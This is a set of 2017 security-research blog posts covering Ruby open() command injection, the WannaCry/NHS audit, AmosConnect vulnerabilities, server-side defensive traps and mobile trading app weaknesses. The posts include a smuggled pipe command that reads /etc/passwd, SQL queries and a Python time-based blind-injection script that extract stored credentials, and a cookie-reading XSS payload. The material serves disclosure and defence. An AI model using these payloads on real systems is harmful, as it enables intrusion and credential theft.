RESEARCH | November 21, 2017

Hidden Exploitable Behaviors in Programming Languages

On February 28th, 2015, Egor Homakov wrote an article[1] exposing the dangers of Ruby’s open() function. The function is commonly used to request URLs programmatically with the open-uri library; however, instead of requesting a URL, you may end up executing an operating system command.


Consider the following Ruby script named open-uri.rb:

require 'open-uri'
print open(ARGV[0]).read

The following command requests a web page:
# ruby open-uri.rb "https://ioactive.com"

 

And the following output is shown:

<!DOCTYPE HTML>
<!--[if lt IE 9]><html class="ie"><![endif]-->
<!--[if !IE]><!--><html><!--<![endif]--><head>
                <meta charset="UTF-8">
                <title>IOActive is the global leader in cybersecurity, penetration testing, and computer services</title>
[…SNIP…]

 

Works as expected, right? Still, the same call can be used to open a process and execute arbitrary commands. If a similar Ruby script is used in a web application with weak input validation, you could simply send a pipe followed by your favorite OS command in a remote request:

|head /etc/passwd

 

And the following output could be shown:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
[…SNIP…]

 

The difference between the two executions is just the pipe character at the beginning of the argument. The pipe causes Ruby to stop using the open-uri function and fall back to the native Kernel#open, which allows command execution[2].
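The defense is to never hand raw user input to an opener: parse it first and accept only genuine http(s) URLs (in Ruby, for example, URI.parse(url).open fails safely for anything that is not a proper URL). A minimal sketch of the allow-list idea, shown in Python purely for illustration:

from urllib.parse import urlparse
from urllib.request import urlopen

def fetch(untrusted_url):
    # Allow-list the scheme: an input such as "|head /etc/passwd" has no
    # http(s) scheme, so it is rejected before anything is opened.
    parsed = urlparse(untrusted_url)
    if parsed.scheme not in ("http", "https"):
        raise ValueError("refusing to open non-http(s) input: %r" % untrusted_url)
    return urlopen(untrusted_url).read()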

 
Applications may be exposed to unpredictable security issues when they rely on certain programming language features. A number of behaviors in different implementations can be abused to undermine otherwise secure applications, and unexpected scenarios exist in the interpreters parsing JavaScript, Perl, PHP, Python, and Ruby code.
 
Come and join me at Black Hat Europe[3] to learn more about these risky features and how to detect them. An open source extended differential fuzzing framework will be released to aid in the disclosure of these types of behaviors.
[1] Using open-uri? Check your code – you’re playing with fire! (https://sakurity.com/blog/2015/02/28/openuri.html)
 
[2] A dozen (or so) ways to start sub-processes in Ruby: Method #4: Opening a pipe (https://devver.wordpress.com/2009/07/13/a-dozen-or-so-ways-to-start-sub-processes-in-ruby-part-2/)
[3] Exposing Hidden Exploitable Behaviors in Programming Languages Using Differential Fuzzing (https://www.blackhat.com/eu-17/briefings.html#exposing-hidden-exploitable-behaviors-in-programming-languages-using-differential-fuzzing)
EDITORIAL | November 14, 2017

Treat the Cause, not the Symptoms!

With the publication of the National Audit Office report on WannaCry fresh off the press, I think it’s important that we revisit what it actually means. There are worrying statements within the various reports around preventative measures that could have been taken. In particular, where the health service talks about treating the cause, not the symptom, you would expect that ethos to cross functions, from the primary caregivers to the primary security services. 

I read that the NHS Digital team carried out an onsite cyber assessment of 88 out of 236 Trusts. None passed. Not one. Think about this. These Trusts are businesses whose core function is the health and well-being of their customers, the patients. If this were a bank, and someone did an onsite assessment and said: “well, the bank left all the doors open and didn’t lock the vault”, would you put your hard-earned money in there for safekeeping? I don’t think so. More importantly, if the bank said after a theft of all the money, “well, the thieves used masks; we didn’t recognize them; they were very sophisticated”, would you be happy? No. Now imagine what could have been found if someone had carried out an in-depth assessment, thinking like the adversary.


The report acknowledges the existence of a cyber-attack plan. However, the plan hadn’t been communicated. So, no one knew who was doing what because the plan hadn’t been practiced and perfected. The only communication channel the plan provided for, email, was shut down. This meant that primary caregivers ended up communicating with personal devices using WhatsApp, potentially exposing Patient Medical Records on personal mobile phones through a social messaging tool. 

The report also states the NHS Digital agency had no power to force the Trusts to “take remedial action even if it [NHS Digital] has concerns about the vulnerability of an organization”. At IOActive, we constantly talk to our customers about what to do in the case of a found vulnerability. Simply ticking a box without follow up is a pointless exercise. “My KPI is to perform a security assessment of 50% of the Trusts” – box ticked. That’s like saying “I will perform triage on 50% of my patients, but won’t treat them”. Really?! 

An efficacy assessment of your security practices is not an audit report. It is not a box-ticking exercise. It is a critical function designed specifically to enable you to identify vulnerabilities within your organization’s security posture and empower you to facilitate appropriate controls to manage risk at a business level. Cyber Security and Information Security are not IT issues; they are business issues. As such, the business should absolutely be focused on having skilled experts providing actionable intelligence, enabling them to make business decisions based on risk, impact and likelihood. It’s not brain surgery, or maybe it is.

It’s generally accepted that, if the NHS had taken basic IT security steps, this problem would have been avoided. Treat the cause, not the symptom. We are hearing a lot of evidence that this was an orchestrated attack from a nation-state. However, I’m pretty sure, given the basic failures of NHS Digital to protect the environment, it wouldn’t have taken a nation-state to launch this destructive attack.

Amyas Morse, Head of NAO said: “It was a relatively unsophisticated attack and could have been prevented by the NHS following basic IT security best practices. There are more sophisticated cyber-threats out there than WannaCry, so the Department and the NHS need to get their act together to ensure the NHS is better protected against future attacks.” I can absolutely guarantee there are more sophisticated attacks out there. 

Eighty-one NHS organizations were impacted. Nineteen-thousand five hundred medical appointments canceled. Six hundred GP surgeries unable to support patients. Five hospitals diverted ambulances elsewhere. Imagine the human factor. You’re waiting for a lifesaving operation – canceled. You’ve been in a car crash – ambulance diverted 40 miles away. All because Windows 7 wasn’t patched. Is that acceptable for an organization trusted with the care and well-being of you and your loved ones? Imagine the damage had this attack been more sophisticated.

Cybersecurity assessments are not audit activities. They are mission-critical assessments for the longevity of your business. The NHS got lucky. There are not many alternatives for health care. It’s not like you can pop down the street and choose the hospital next door. And that means they can’t be complacent about their duty of care. People’s lives are at stake. Treat the cause, not the symptoms.

RESEARCH | October 26, 2017

AmosConnect: Maritime Communications Security Has Its Flaws

Satellite communications security has been a target of our research for some time: in 2014 IOActive released a document detailing many vulnerabilities in popular SATCOM systems. Since then we’ve had the opportunity to dive deeper in this area, and learned a lot more about some of the environments in which these systems are in place.

Recently, we saw that Shodan released a new tool that tracks the location of VSAT systems exposed to the Internet. These systems are typically installed in vessels to provide them with internet connectivity while at open sea.


The maritime sector makes use of some of these systems to track and monitor ships’ IT and navigation systems as well as to aid crew members in some of their daily duties, providing them with e-mail or the ability to browse the Internet. Modern vessels don’t differ that much from your typical office these days, aside from the fact that they might be floating in a remote location.

Satellite connectivity is an expensive resource. In order to minimize its cost, several products exist to perform optimizations around the compression of data while in transit. One of the products that caught our eye was AmosConnect.

AmosConnect 8 is a platform designed to work in a maritime environment in conjunction with satellite equipment, providing services such as: 

  • E-mail
  • Instant messaging
  • Position reporting
  • Crew Internet
  • Automatic file transfer
  • Application integration


We have identified two critical vulnerabilities in this software that allow unauthenticated attackers to fully compromise an AmosConnect server. We reported these vulnerabilities, but there is no fix for them, as Inmarsat has discontinued AmosConnect 8, announcing its end-of-life in June 2017. The original advisory is available here, and this blog post will also discuss some of the technical details.

 

Blind SQL Injection in Login Form
A Blind SQL Injection vulnerability is present in the login form, allowing unauthenticated attackers to gain access to credentials stored in its internal database. The server stores usernames and passwords in plaintext, making this vulnerability trivial to exploit.

The following POST request is sent when a user tries to log into AmosConnect:


The parameter data[MailUser][emailAddress] is vulnerable to Blind SQL Injection, enabling data retrieval from the backend SQLite database using time-based attacks.

Attackers that successfully exploit this vulnerability can retrieve credentials to log into the service by executing the following queries:

SELECT key, value FROM MOBILE_PROPS WHERE key LIKE 'USER.%.password';

SELECT key, value FROM MOBILE_PROPS WHERE key LIKE 'USER.%.email_address';
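Exploiting a blind injection like this boils down to asking yes/no questions and timing the responses. SQLite has no SLEEP() function, so delays are usually induced with expensive expressions such as RANDOMBLOB(). A rough sketch of such a timing oracle, where the endpoint path and the payload shape are illustrative assumptions and only the parameter name comes from the request above:

import time

import requests  # third-party HTTP client (pip install requests)

LOGIN_URL = "https://target/webmail/index.php"  # hypothetical endpoint path

def condition_holds(condition):
    # When `condition` is true, SQLite evaluates HEX(RANDOMBLOB(100000000))
    # and the response comes back measurably slower: a one-bit oracle.
    payload = ("x' AND (SELECT CASE WHEN (%s) "
               "THEN LIKE('a', HEX(RANDOMBLOB(100000000))) "
               "ELSE 1 END)--" % condition)
    start = time.monotonic()
    requests.post(LOGIN_URL,
                  data={"data[MailUser][emailAddress]": payload},
                  timeout=60)
    return time.monotonic() - start > 5.0

Asking one such question per character of the queries shown above recovers the stored credentials, one fragment at a time.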

The authentication method is implemented in mail_user.php:

The call to findByEmail() instantiates a COM object that is implemented in native C++ code.

 

The following C++ native methods are invoked upon execution of the call:

    Neptune::UserManager::User::findByEmail( ... )
        Neptune::ConfigManager::Property::findBy( ... )
            Neptune::ConfigManager::Property::findAllBy( ... )

The vulnerable code is implemented in Neptune::ConfigManager::Property::findAllBy() as seen below:

 

 

Strings are concatenated in an insecure manner, building a SQL query that in this case would look like:
"[…] deleted = 0 AND key like 'USER.%.email_address' AND upper(value) like '{email}'"
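The corresponding fix is to keep user input out of the query string entirely and bind it as a parameter. A minimal sketch using Python’s sqlite3 module for brevity (native C++ code such as findAllBy() would use the equivalent sqlite3_bind_* APIs; the table and column names come from the queries above):

import sqlite3

def find_by_email(db_path, email):
    conn = sqlite3.connect(db_path)
    # The ? placeholder binds `email` as data, never as SQL, so quotes
    # and wildcards in the input cannot change the shape of the query.
    cur = conn.execute(
        "SELECT key, value FROM MOBILE_PROPS "
        "WHERE deleted = 0 AND key LIKE 'USER.%.email_address' "
        "AND upper(value) LIKE upper(?)",
        (email,),
    )
    return cur.fetchall()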

 

Privileged Backdoor Account

The AmosConnect server features a built-in backdoor account with full system privileges. Among other things, this vulnerability allows attackers to execute commands with SYSTEM privileges on the remote system by abusing AmosConnect Task Manager.
 
Users accessing the AmosConnect server see the following login screen:
 
The login website reveals the Post Office ID; this ID identifies the AmosConnect server and is tied to the software license.
 
The following code belongs to the authentication method implemented in mail_user.php. Note the call to authenticateBackdoorUser():
 
authenticateBackdoorUser() is implemented as follows:
 
 
The following code snippet shows how an attacker can obtain the SysAdmin password for a given Post Office ID:

Conclusions and Thoughts

Vessel networks are typically segmented and isolated from each other, in part for security reasons. A typical vessel network configuration might feature some of the following subnets:

  • Navigation systems network. Some of the most recent vessels feature “sail-by-wire” technologies; the systems in charge of providing this technology are located in this network.
  • Industrial Control Systems (ICS) network. Vessels contain a lot of industrial machinery that can be remotely monitored and operated. Some vessels feature a dedicated network for these systems; in some configurations, the ICS and Navigation networks may actually be the same.
  • IT systems network. Vessels typically feature a separate network to support office applications. IT servers and crew members’ work computers are connected to this network; it’s within this network that AmosConnect is typically deployed.
  • Bring-Your-Own-Device (BYOD) networks. Vessels may feature a separate network to provide internet connectivity to guests’ or crew members’ personal devices.
  • SATCOM. While this may change from vessel to vessel, some use a separate subnet to host satellite communications equipment.

While the vulnerabilities discussed in this blog post may only be exploited by an attacker with access to the IT systems network, it’s important to note that in certain vessel configurations some networks might not be segmented, or AmosConnect might be exposed to one or more of these networks. A typical scenario would make AmosConnect available to both the BYOD “guest” and IT networks; one can easily see how these vulnerabilities could be exploited by a local attacker to pivot from the guest network to the IT network. Also, some of the vulnerabilities uncovered during our SATCOM research might enable attackers to access these systems via the satellite link.
 
All in all, these vulnerabilities pose a serious security risk. Attackers might be able to obtain corporate data, take over the server to mount further attacks or pivot within the vessel networks.
References:
https://shiptracker.shodan.io/
INSIGHTS | October 23, 2017

Embedding Defense in Server-side Applications

Applications always contain security flaws, which is why we rely on multiple layers of defense. Even with exhaustive testing and layered defenses, applications are still compromised. Perhaps we should rethink our approach to application defense, with the goal of introducing defensive methods that cause attackers to cease, or induce them to take incorrect actions based on false premises.

 

There are a variety of products that provide valuable resources when basic, off-the-shelf protection is required or the application source code is not available. However, implementations in native code provide a greater degree of defense that cannot be achieved using third-party solutions. This document aims to:
  • Enumerate a comprehensive list of current and new defensive techniques.
    Multiple defensive techniques have been disclosed in books, papers and tools. This specification collects those techniques and presents new defensive options to fill the opportunity gap that remains open to attackers.

 

  • Enumerate methods to identify attack tools before they can access functionalities.
    The tools used by attackers identify themselves in several ways. Multiple features of a request can disclose that it is not from a normal user; a tool may abuse security flaws in ways that can help to detect the type of tool an attacker is using, and developers can prepare diversions and traps in advance that a specific tool will trigger automatically (a sketch of one such trap follows this list).

 

  • Disclose how to detect attacker techniques within code.
    Certain techniques can identify attacks within the code. Developers may know in advance that certain conditions will only be triggered by attackers, and they can also be prepared for certain unexpected scenarios.

 

  • Provide a new defensive approach.
    Server-side defense is normally about blocking the malicious IP addresses associated with attackers; however, an attacker’s focus can also be diverted or modified. Sometimes certain functionalities may be presented to attackers only to better prosecute them if those functionalities are triggered.

 

  • Provide these protections for multiple programming languages.
    This document will use pseudo code to explain functionalities that can reduce the effectiveness of attackers and expose their actions, and working proof-of-concept code will be released for four programming languages: Java, Python, .NET, and PHP.
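To make the trap idea from the second bullet concrete, here is a minimal, hypothetical sketch in Python (one of the four target languages), assuming the Flask microframework: a decoy field that no legitimate client ever submits, but that a tool blindly fuzzing every parameter will trigger.

from flask import Flask, request, abort

app = Flask(__name__)

@app.route("/login", methods=["POST"])
def login():
    # "debug" is a decoy field: it does not exist in the real form, so any
    # request supplying it was generated by a tool enumerating parameters.
    if "debug" in request.form:
        app.logger.warning("scanner trap hit from %s", request.remote_addr)
        abort(404)  # divert the tool with a misleading response
    ...  # normal authentication continues here
    return "ok"

Responding with a misleading 404 both flags the source address and feeds the tool a false premise about which parameters exist.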
Fernando Arnaboldi appeared at Ruxcon to present defensive techniques that can be embedded in server-side applications. The techniques described are included in a specification, along with sample implementations for multiple programming languages.
ADVISORIES | October 17, 2017

Microsoft Kernel Graphic Driver Kernel Memory Address Disclosure

The latest version of Microsoft Basic Render Driver (BasicRender.sys 10.0.15063.413) is vulnerable to information disclosure. This issue allows an unprivileged user to map the kernel memory layout.

EDITORIAL | October 3, 2017

[Meta Analysis] Rick and Morty S3E1: The Hacker’s Episode

Hi folks, I’m a huge Rick and Morty fan. Sometimes while watching it, I notice allegories and puns related to security, privacy, physics, psychology, and a wide range of scientific fields. Because of this, I’ve decided to review a Rick and Morty episode and share my observations with the wonderful folks who work in these fields and those who aspire to 😉 Enjoy!
A machine force feeding a human. Being brutally and utterly dedicated to our whims, the robots show us how perverted our ideas of success, good, and bad are when taken to an extreme – effectively giving us a taste of our own “medicine.”  
 

Before we dig into what this episode means, here’s a quick summary from Wikipedia:

Rick is interrogated via a mind-computer link inside a galactic federal prison. Summer and Morty attempt to rescue him, but they are captured by SEAL Team Ricks, who take them to the Citadel of Ricks and decide to assassinate Rick. Back at the prison, Rick tricks both the federal agents and his aspiring assassins by switching bodies with them. He then teleports the entire Citadel into the federal prison, prompting a massive battle. Amid the confusion, Rick rescues Morty and Summer and uses the Galactic Federation’s mainframe to make their currency worthless. The Federation falls into chaos and collapses as a result, with the aliens leaving Earth. Back at home, Jerry asks Beth to choose between him and Rick, but she chooses Rick. After the new status quo is established, Rick reveals to Morty that his ulterior motive was to become his de facto male influence. This escalates into a nonsensical angry rant, centered around Rick’s desire to find more of the discontinued McDonald’s Szechuan sauce, a promotional product for the 1998 film Mulan.
Let’s dig in…
 

The Brainalyzer

Rick is trapped in something called a “Brainalyzer,” which is effectively a brain-to-computer link. This is a computer science pun in a couple of ways. It obviously references cutting-edge computer science research into literally connecting people’s brains to computers. In academic circles, researchers have found ways to control a computer with your brain or have your brain controlled by a computer.
Rick in the Brainalyzer.

The Brainalyzer also serves as an ironic expression of the false ideology people have of computers: that they are NOT directly connected to our brains.

The software we write for the computer, the hardware we build for the computer, and the perspectives we have of all of these things are entirely inside our heads.

As a hacker, I can tell you that what you do when you try to break someone’s algorithm is basically argue with the person who wrote the algorithm in your head! One person’s implementation of their idea of what security is competes with yours; it’s all mind games. Coming back to the episode, this is literally what Rick is doing in the scene; inside his head, he argues with the person who is ‘securing him’ in the prison.

The flip side of this Brainalyzer – from a security perspective – is that it is a huge security design mistake. Interfacing the thoughts of the prisoners to the prison computer system (which controls the prison) makes separation failure a huge security risk. Ironically, the prison exists to physically restrain the prisoners because they are bad people who think of doing bad things. The Brainalyzer is implemented in utter reverse to this idea; in a sense, it is a way to control the prison in the literal minds of the people they are imprisoning.

Rick’s Mind Virus(es)
The strategy the interrogators employ is to ask Rick to share the memory of his first successful creation of the Portal Gun. Rick then leads them to the memory, which turns out to be a complete fabrication.
Rick’s exploit being uploaded…

What has happened here is Rick has convinced them one kind of information or data in his head is actually another kind of information or data. This is strongly analogous to what is called a memory corruption attack. In a memory corruption attack, the adversary convinces the machine that malicious data (one kind of information) is actually execution code (another kind of data), or that “data” should be treated as literal instructions. This flaw allows the attacker to inject data that is interpreted as code, thereby allowing the attacker’s data to arbitrarily influence the behavior of the machine.

So now we see Rick has triggered a memory corruption bug! And he does this to inject code into the machine that gives them access to his brain. Rick confirms this by referring to the code he gave them as a “virus,” and stating that he did it to install a backdoor that allows him full control of the facility.

Rick literally psychoanalyzing his opponent – “getting inside his head.”
Rick now has full control of the “memory” they are trapped in and reveals that he was fooling them the entire time. What is ironic about this is that Rick is physically trapped in a machine that allows them direct access to his brain. That is to say, while they are “inside his brain,” because Rick was hustling them this whole time, he was actually inside their heads!

Gotta Go Take a Sh*t…

After escaping the Brainalyzer, Rick suddenly needs to use the bathroom on Level 9. This is obviously a social engineering exploit. Restrooms are often located behind security barriers; however, if there is a kind receptionist, they can usually be talked into letting you through to use the bathroom, at which point you’ve bypassed security and you’re in! It’s a very old trick; Kevin Mitnick would probably giggle to see Rick haphazardly employ this tactic.
Rick social engineering his way to level 9
The allegory becomes a little more obvious after this scene. Starting from a subtle, nuanced example of a security exploit (judging by the depth of the metaphor), the plot switches to a more obvious and almost sloppy “gotta go take a sh*t,” with Rick literally declaring his intention at the end of the episode. This “escalation” is a common cadence in security attacks (starting small, ending big): you always start from a small crack and chip away until you have Domain Admin rights. Every hacker knows that!
Just before Rick can make use of the password, he is interrupted by assassins from the Council of Ricks. Quickly, he escapes in what is a literal instantiation of an authentication replay, or a kind of “session hijacking” attack. Here Rick swaps identities with someone in the group trying to catch him, thereby tricking them into killing the wrong person. Rick has now gone from an interrogator in the prison to a member of SEAL Team Rick. One epic privilege escalation attack!

The Privilege Escalation Attack

After killing the entire SEAL team, he makes his way to the citadel as Rick D99. He then pulls off another obvious privilege escalation attack by specifically asking for someone with a certain level of “higher” clearance.
Rick Phone Phreaking/Hardware Hacking his way into the citadel

Assuming this role, he then moves to gain control of the entire domain and jokes about how bad the system design is (another jab at information security engineering). The design flaw here is that there is no further authentication or oversight needed to perform an incredibly dangerous function; you just walk up to it and press the right buttons – no executive calls, no approval process…just buttons! He abuses this design as a citadel employee to teleport the entire citadel straight into the galactic prison he just escaped from, causing a massive war between the citadel and the galactic prison.

The person in the center here looks strikingly similar to Rick in the previous image. The armor, the hair. Some might recognize the “Butter Robot”-esque android being built in the background. This is the site banner for DEF CON, the world’s biggest hacking conference :).

The BitFlip Attack

Following this, Rick makes his way to Level 9, finally admitting his entire scheme was an elaborate ploy to, in fact, “get Level 9 access without a password!” He explains his entire chain of exploits as a revenge arc triggered when the Citadel’s attempted assassination interrupted his imminent access to Level 9. Having gained Level 9 access, Rick uses what could be seen as another very old security attack called “bit flipping.” This term is sometimes used loosely to refer to attacks that can deterministically change something’s state in a way that affects security. Usually, these “states” are represented using simple Boolean values of 0 or 1. For example, Row Hammer has been exploited to flip bits in a table that holds security-relevant information. Effectively, this is what Rick is doing with the currency value: flipping a 1 bit to 0. A small error that eventually topples an entire federation. Start small, end big!
That’s it for now, until I dig up more macabre information security or extra-scientific analogies.
This blog was originally written and posted on September 25, 2017 by Keith Makan and is reproduced here with his express permission.
RESEARCH | September 26, 2017

Are You Trading Securely? Insights into the (In)Security of Mobile Trading Apps

The days of open shouting on the trading floors of the NYSE, NASDAQ, and other stock exchanges around the globe are gone. With the advent of electronic trading platforms and networks, the exchange of financial securities now is easier and faster than ever; but this comes with inherent risks.

From the beginning, bad actors have also joined Wall Street’s party, developing clever models for fraudulent gains. Their efforts have included everything from fictitious brokerage firms that ended up being Ponzi schemes[1] to organized cells performing Pump-and-Dump scams.[2] (Pump: buy cheap shares and inflate the price through sketchy financials and misleading statements to the marketplace through spam, social media and other technological means; Dump: once the price is high, sell the shares and collect a profit).

When it comes to financial cybersecurity, it’s worth noting how banking systems are organized when compared to global exchange markets. In banking systems, the information is centralized in a single financial entity; there is one point of failure rather than many, which makes such systems more vulnerable to cyberattacks.[3] In contrast, global exchange markets are distributed; records of who owns what, who sold/bought what, and to whom, are not stored in a single place, but many. Like matter and energy, stocks and other securities cannot be created from the void (e.g. by a modified database record within a financial entity). Once issued, they can only be exchanged from one entity to another. That said, the valuable information as well as the attack surface and vectors in trading environments are slightly different than those in banking systems.

 
Picture taken from http://business.nasdaq.com/list/
 

Over the years I’ve used the desktop and web platforms offered by banks in my country with limited visibility of available trade instruments. Today, accessing global capital markets is as easy as opening a Facebook account through online brokerage firms. This is how I gained access to a wider financial market, including US-listed companies. Anyone can buy and sell a wide range of financial instruments on the secondary market (e.g. stocks, ETFs, etc.), derivatives market (e.g. options, binary options, contracts for difference, etc.), forex markets, or the avant-garde cryptocurrency markets.

Most banks with investment solutions and the aforementioned brokerage houses offer mobile platforms to operate in the market. These apps allow you to do things including, but not limited to:

  • Fund your account via bank transfers or credit card
  • Keep track of your available equity and buying power (cash and margin balances)
  • Monitor your positions (securities you own) and their performance (profit)
  • Monitor instruments or indexes
  • Give buy/sell orders
  • Create alerts or triggers to be executed when certain thresholds are reached
  • Receive real-time news or video broadcasts
  • Stay in touch with the trading community through social media and chats

Needless to say, whether you’re a speculator, a very active intra-day trader, or simply someone who likes to follow long-term buy-and-hold strategies, every single item on the previous list must be kept secret and only known by and shown to its owner.


 

Four months ago, while using my trading app, I asked myself, “with the huge amount of money transacted in the money market, how secure are these mobile apps?” So, there I was, one minute later, starting this research to expose cybersecurity and privacy weaknesses in some of these apps.

Before I pass along my results, I’d like to share the interesting and controversial moral of the story: the app developed by a brokerage firm that suffered a data breach many years ago was shown to be the most secure one.

Scope

My analysis encompassed the latest version of 21 of the most used and well-known mobile trading apps available on the Apple Store and Google Play. Testing focused only on the mobile apps; desktop and web platforms were not tested. While I discovered some security vulnerabilities in the backend servers, I did not include them in this article.

Devices:

  • iOS 10.3.3 (iPhone 6) [not jailbroken]
  • Android 7.1.1 (Emulator) [rooted]

I tested the following 14 security controls, which represent just the tip of the iceberg when compared to an exhaustive list of security checks for mobile apps. This may give you a better picture of the current state of these apps’ security. It’s worth noting that I could not test all of the controls in some of the apps either because a feature was not implemented (e.g. social chats) or it was not technically feasible (e.g. SSL pinning that wouldn’t allow data manipulation), or simply because I could not open an account.

Results

Unfortunately, the results proved to be much worse than those for personal banking apps in 2013 and 2015.[4] [5] Cybersecurity has not been on the radar of the FinTech space in charge of developing trading apps. Security researchers have disregarded these apps as well, probably because of a lack of understanding of money markets.

The issues I found in the tested controls are grouped in the following sections. Logos and technical details that mention the name of brokerage institutions were removed from the screenshots, logs, and reverse engineered code to prevent any negative impacts to their customers or reputation.

Cleartext Passwords Exposed

In four apps (19%), the user’s password was sent in cleartext either to an unencrypted XML configuration file or to the logging console. Physical access to the device is required to extract them, though.

In a hypothetical attack scenario, a malicious user could extract a password from the file system or the logging functionality without any in-depth know-how (it’s relatively easy), log in through any other trading platform from the brokerage firm, and perform unauthorized actions. They could sell stocks, transfer the money to a newly added bank account, and delete this bank account after the transfer is complete. During testing, I noticed that most of the apps require only the current password to link bank accounts and do not have two-factor authentication (2FA) implemented; therefore, no authorization one-time password (OTP) is sent to the user’s phone or email.

In two apps, like the following one, in addition to logging the username and password, authentication takes place through an unencrypted HTTP channel:
In another app, the new password was exposed in the logging console when a user changes the password:

Trading and Account Information Exposed

In the trading context, operational or strategic data must not be sent unencrypted to the logging console nor any log file. This sensitive data encompasses values such as personal data, general balances, cash balance, margin balance, net worth, net liquidity, the number of positions, recently quoted symbols, watchlists, buy/sell orders, alerts, equity, buying power, and deposits. Additionally, sensitive technical values such as username, password, session ID, URLs, and cryptographic tokens should not be exposed either.
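One cheap safeguard is a scrubbing filter in front of every log sink, so that known-sensitive fields never reach the console or disk in the first place. A minimal sketch with Python’s logging module (the field names are illustrative):

import logging
import re

SENSITIVE = re.compile(r"(password|sessionid|token)=\S+", re.IGNORECASE)

class RedactingFilter(logging.Filter):
    # Rewrites each record's message before any handler can emit it.
    def filter(self, record):
        record.msg = SENSITIVE.sub(r"\1=[REDACTED]", str(record.msg))
        return True

log = logging.getLogger("trading")
log.addFilter(RedactingFilter())
log.warning("login ok, sessionid=deadbeef")  # emitted as sessionid=[REDACTED]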

62% of the apps sent sensitive data to log files, and 67% stored it unencrypted. Physical access to the device is required to extract this data.

If these values are somehow leaked, a malicious user could gain insight into users’ net worth and investing strategy by knowing which instruments users have been looking for recently, as well as their balances, positions, watchlists, buying power, etc.

Imagine a hypothetical scenario where a high-profile, sophisticated investor loses his phone and the trading app he has been using stores his “Potential Investments” watchlist in cleartext. If the extracted watchlist ends up in the hands of someone who wants to mimic this investor’s strategy, they could buy stocks prior to a price increase. In the worst case, imagine a “Net Worth” figure landing in the wrong hands, say kidnappers, who now know how generous the ransom could be.

Balances and investment portfolio leaked in logs:

 
Buy and sell orders leaked in detail in the logging console:
Personal information stored in configuration files:
 
“Potential Investments” and “Will Buy Later” watchlists leaked in the logs console:
 
“Favorites” watchlists leaked in the logs too:
 
Quoted tickers leaked:
 
Symbol quoted dumped in detail in the console:
 
Quoted instruments saved in a local SQLite database:
Account number and balances leaked:

Insecure Communication

Two apps use unencrypted HTTP channels to transmit and receive all data, and 13 of the 19 apps that use HTTPS do not check the authenticity of the remote endpoint by verifying its SSL certificate (SSL pinning); therefore, it’s feasible to perform Man-in-the-Middle (MiTM) attacks to eavesdrop on and tamper with data. Some MiTM attacks require tricking the user into installing a malicious certificate on the mobile device.
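Pinning itself is conceptually simple: compare the certificate the server actually presents against a fingerprint shipped inside the app. A minimal sketch in Python (mobile apps would do the equivalent with their platform TLS APIs; the fingerprint value is a placeholder):

import hashlib
import socket
import ssl

# SHA-256 of the server's DER-encoded certificate, obtained out of band
# and shipped with the app (placeholder value below).
PINNED_SHA256 = "0" * 64

def connect_pinned(host, port=443):
    ctx = ssl.create_default_context()
    sock = ctx.wrap_socket(socket.create_connection((host, port)),
                           server_hostname=host)
    der = sock.getpeercert(binary_form=True)
    if hashlib.sha256(der).hexdigest() != PINNED_SHA256:
        sock.close()
        raise ssl.SSLError("certificate fingerprint mismatch: possible MiTM")
    return sock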

Under certain circumstances, an attacker with access to some part of the network, such as the router in a public Wi-Fi, could see and modify information transmitted to and from the mobile app. In the trading context, a malicious actor could intercept and alter values, such as the bid or ask prices of an instrument, and cause a user to buy or sell securities based on misleading information.

For instance, the following app uses an insecure channel for communication by default; an inexperienced user who does not know the meaning of “SSL” (Secure Sockets Layer) won’t enable it on the login screen, and all sensitive data will be sent and received in cleartext, without encryption:

One single app was found to send a log file with sensitive trading data to the server on a scheduled basis over an unencrypted HTTP channel.

Some apps transmit non-sensitive data (e.g. public news or live financial TV broadcastings) through insecure channels, which does not seem to represent a risk to the user.

Authentication and Session Management

Nowadays, most modern smartphones support fingerprint-reading, and most trading apps use it to authenticate their customers. Only five apps (24%) do not implement this feature.

Unfortunately, using the fingerprint database in the phone has a downside:

 
Moreover, after clicking the logout button, sessions were still valid on the server side in two apps. Also, another couple of apps enforced lax password policies:

Privacy Mode

One single trading app (look for “the moral of the story” earlier in this article) supports “Privacy Mode,” which protects the customers’ private information displayed on the screen in public areas where shoulder-surfing[6] attacks are feasible. The rest of the apps do not implement this useful and important feature.

However, there’s a small bug in this unique implementation: every sensitive figure is masked except in the “Positions” tab where the “Net Liquidity” column and the “Overall Totals” are fully visible:

It’s worth noting that not only balances, positions, and other sensitive values in the trading context should be masked, but also credit card information when entered to fund the account:

Client-side Data Validation

In most, but not all, of the apps that don’t check SSL certificates, it’s possible to perform MiTM attacks and inject malicious JavaScript or HTML code in the server responses. Since the Web Views in ten apps are configured to execute JavaScript code, it’s possible to trigger common Cross-site Scripting (XSS) attacks.

XSS triggered in two different apps (<script>alert(document.cookie);</script>):

Fake HTML forms injected to deceive the user and steal credentials:

Root Detection

Many Android apps do not run on rooted devices for security reasons. On a rooted phone or emulator, the user has full control of the system, thus, access to files, databases, and logs is complete. Once a user has full access to these elements, it’s easy to extract valuable information.

20 of the apps (95%) do not detect rooted environments. The single app (look for “the moral of the story” earlier in this article) that does detect it simply shows a warning message; it allows the user to keep using the platform normally:

Hardcoded Secrets in Code and App Obfuscation

Six Android app installers (.apk files) were easily reverse engineered into human-readable code. The rest had medium to high levels of obfuscation, like the one shown below. The goal of obfuscation is to conceal the application’s purpose and logic (security through obscurity) in order to deter reverse engineering and make it more difficult.

 
In the non-obfuscated apps, I found secrets such as cryptographic keys and third-party service partner passwords. This could allow unauthorized access to other systems that are not under the control of the brokerage houses. For example, a Morningstar.com account (investment research) hardcoded in a Java class:
Interestingly, ten of the apps (47%) contain traces (internal hostnames and IP addresses) of the development and testing environments where they were built or tested:

Other Weaknesses

The following trust issue grabbed my attention: a URL with my username (email) and first name passed as parameters was leaked to the logging console. This URL is opened to talk with, apparently, a chatbot inside the mobile app; but if you grab this URL and open it in a common web browser, the chatbot takes your identity from the supplied parameters and trusts you as a logged-in user. From there, you can ask for details about your account. As you can see, all you need to retrieve someone else’s private data is his or her email address and name:

 

I haven’t had enough time to fully test this feature, but so far, I was able to extract balances and personal information.

Statistics

Since a picture is worth a thousand words, consider the following graphs:

Responsible Disclosure

One of IOActive’s missions is to act responsibly when it comes to vulnerability disclosure; thus, between September 6th and 8th, we sent a detailed report to 13 of the brokerage firms whose trading apps presented some of the higher-risk vulnerabilities discussed in this article.

To date, only two brokerage firms have replied to our email.

Regulators and Rating Organizations

